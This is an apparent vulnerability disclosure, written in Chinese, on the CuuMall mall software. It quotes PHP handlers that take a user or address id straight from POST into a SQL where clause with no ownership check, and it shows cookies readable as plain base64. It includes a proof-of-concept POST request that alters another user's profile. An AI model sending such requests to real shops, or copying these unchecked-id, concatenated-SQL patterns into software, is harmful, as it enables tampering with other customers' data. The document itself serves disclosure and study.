### 简要描述: CuuMall免费开源商城系统 越权集合 ### 详细说明: CuuMall免费开源商城系统 越权可修改对方的 收货地址 个人信息 等等 这里我们举一个例子,修改个人信息 直接看代码: UserInfoAction.class.php:(716-735) ``` public function posteditpro( ) { $uid = $_POST['uid']; $data['shen'] = $_POST['shen']; $data['shi'] = $_POST['shi']; $data['qu'] = $_POST['qu']; $data['sex'] = $_POST['sex']; $data['realname'] = $_POST['realname']; $data['email'] = $_POST['email']; $data['more'] = $_POST['more']; $data['youbian'] = $_POST['youbian']; $data['tel'] = $_POST['tel']; $data['mob'] = $_POST['mob']; $data['qq'] = $_POST['qq']; $data['ww'] = $_POST['ww']; $rej = new Model( "m_per" ); $rej->data( $data )->where( "uid=".$uid )->save( ); $this->assign( "msgTitle", "编辑个人档案成功!" ); $this->success( "编辑个人档案成功!" ); } ``` 我们看看权限判断是靠什么: 还是这个文件(28-35) ``` $co = new Cookie( ); $username = $co->get( c( "GUESTCOOK" )."mall-m-name" ); $password = $co->get( c( "GUESTCOOK" )."mall-m-pass" ); if ( empty( $username ) || empty( $password ) ) { $this->redirect( "home/login" ); exit( ); } ``` 这里只检查了 cookie 中是否存在用户名和密码,也就是只做了“是否已登录”的判断;而且 cookie 里的用户名和密码都可以完全还原为明文 看一下 cookie.class.php: ``` static function get($name) { $value = $_COOKIE[C('COOKIE_PREFIX').$name]; $value = unserialize(base64_decode($value)); return $value; } ``` 这里没有任何密钥 ,也就是说cookie里面的东西对于我们来说就是明文 那么我们回头再看 uid是post过来的 而且 uid 未经任何过滤就直接拼接进了 SQL 的 where 条件(同时存在 SQL 注入风险): $rej->data( $data )->where( "uid=".$uid )->save( ); 这里的 where 条件只根据 POST 提交的 uid 定位记录,从头到尾没有把这个 uid 和 cookie 中登录用户对应的 uid 做比对——前面的 cookie 检查只能证明“已登录”,不能证明“这条记录属于当前用户” 我们发送url POST /cuumall_v2.3/v2.3/mall_upload/index.php/home/userinfo/posteditpro postdata: shen=%E6%B9%96%E5%8C%97&shi=%E8%8D%86%E5%B7%9E%E5%B8%82&qu=%E6%B2%99%E5%B8%82%E5%8C%BA&uid=5&realname=&email=test%401.com&more=xddd&youbian=xxx&tel=xxxxx&mob=xxxxxxx&qq=xxxxxxxxxxxxx&ww=xxxxxxxxxxxxxx&imageField.x=93&imageField.y=17&__hash__=f543cb0871b243508a543f0b18b91026 看看cookie里面的username,解出来是test 那么我们uid=5直接更改test2用户的信息资料 [<img src="https://images.seebug.org/upload/201409/301558312a34cafae3363950fb5b3c9fd40839a1.png" alt="18.png" width="600" 
onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/301558312a34cafae3363950fb5b3c9fd40839a1.png) 这里被修改了 我们再看其他地方,还是这个文件: ``` public function postchgrejpro( ) { $id = $_POST['id']; $data['shen'] = $_POST['shen']; $data['shi'] = $_POST['shi']; $data['qu'] = $_POST['qu']; $data['more'] = $_POST['more']; $data['youbian'] = $_POST['youbian']; $data['rejname'] = $_POST['rejname']; $data['mob'] = $_POST['mob']; $data['tel'] = $_POST['tel']; $data['email'] = $_POST['email']; $data['qq'] = $_POST['qq']; $data['ww'] = $_POST['ww']; $rej = new Model( "m_rejpro" ); $rej->data( $data )->where( "id=".$id )->save( ); $this->assign( "waitSecond", 3 ); $this->assign( "jumpUrl", "__APP__/home/userinfo/rejpru" ); $this->assign( "msgTitle", "收货地址编辑成功" ); $this->success( "收货地址编辑成功!" ); } ``` 原理和刚才那个一样:收货地址的 id 同样由 POST 提交并直接拼进 where 条件,没有校验这条地址是否属于当前登录用户,这里不多赘述 其实应该还有好多地方:凡是只凭客户端提交的 uid/id 定位记录、而不与当前登录用户核对归属的地方,都存在同样的越权问题 ### 漏洞证明: